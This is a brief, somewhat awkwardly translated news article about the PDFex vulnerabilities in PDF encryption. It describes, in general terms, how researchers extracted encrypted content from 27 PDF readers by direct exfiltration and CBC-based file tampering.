In the PDF files found critical vulnerability that turns them into “zombies”


The encryption system of the PDF files contains a critical vulnerability, according to German experts on cyber security. We are talking about the protection built into the PDF standard, not the external encryption tools. Based on the found vulnerabilities experts have modeled the attack, which was called “PDFex”.

Studying the vulnerabilities found, German hackers have discovered two ways of its possible use. During the practical tests they cracked 27 PC applications and web applications for reading PDF files, including Adobe Acrobat, Foxit Reader, Nitro, and built-in PDF viewer in Chrome and Firefox. In all cases they managed to retrieve data that was considered encrypted and secure.

The first type of attack using PDFex called “direct exfiltration”. It turns out that the encryption system handles not the whole PDF file, but only some part of it. But the attacker maintained access to the open parts that they can modify — for example, including the user data forwarding at the time of decoding, at a fake address.

The second type of attack is based on the use of CBC tools to spoof encrypted sites directly in the file. The aim here is to create a “mined” file, which itself will send its contents to a remote server using PDF forms or URLS. In the first and in the second case for holding PDFex-attack requires direct access to the file, or at least intercept the network traffic of the user. The vulnerability is considered critical and will be described in detail at the upcoming conference on network security ACM Conference on Computer and Communications Security.